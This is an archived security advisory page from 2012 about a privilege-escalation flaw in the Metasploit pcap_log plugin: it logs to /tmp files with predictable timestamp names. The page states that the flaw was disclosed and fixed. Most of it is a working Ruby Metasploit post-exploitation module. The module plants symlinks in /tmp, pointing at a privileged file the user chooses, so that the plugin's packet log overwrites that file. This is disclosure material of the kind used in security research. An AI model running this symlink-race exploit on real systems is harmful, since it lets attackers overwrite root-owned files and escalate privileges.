exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Metasploit pcap_log Privlege Escalation

Metasploit pcap_log Privlege Escalation
Posted Jul 17, 2012
Authored by 0a29406d9794e4f9b30b3c5d6702c708

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.

tags | exploit, arbitrary
SHA-256 | a3608689ff5f6a56679189ea8149e0e805de1c706fb7d3fedff592abe11d622b

Metasploit pcap_log Privlege Escalation

Change Mirror Download
================
0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges

================
Timeline:
================

16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure
http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html
================
Details:
================

By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.

Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)

======
Sample PoC (needs work)

modules/post/linux/exploit/metasploit_pcaplog.rb
======

# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System

def initialize(info={})
super( update_info( info,
'Name' => 'Metasploit plugin "pcap_log"
arbirary file overwrite / privilege escalation',
'Description' => %q{ Post exploitation module to
exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
Depending on the file you choose to
overwrite, you will need to netcat/telnet etc. the data
that you wish to appear in the file.},

'License' => MSF_LICENSE,
'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'URL',
'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'
],
[ 'URL',
'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740'
]
],
'DisclosureDate'=> "July 16 2012"

))
register_options([
OptInt.new('NUMBER', [true, 'Number of seconds to prime
/tmp/ with', nil]),
OptString.new('FILE', [true, 'File to
overwrite with PCAP data', nil]),
], self.class)

end

def link(t)
file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
"msf3-session", t.year, t.month, t.mday, t.hour,
t.min, t.sec
]
fname = ::File.join("/tmp", file_part)
retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
end

# Run Method for when run command is issued
def run
for i in 0..(datastore['NUMBER'])
link(Time.now+1)
end
print_status("Set #{datastore['NUMBER']} links.")
end

def cleanup
print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close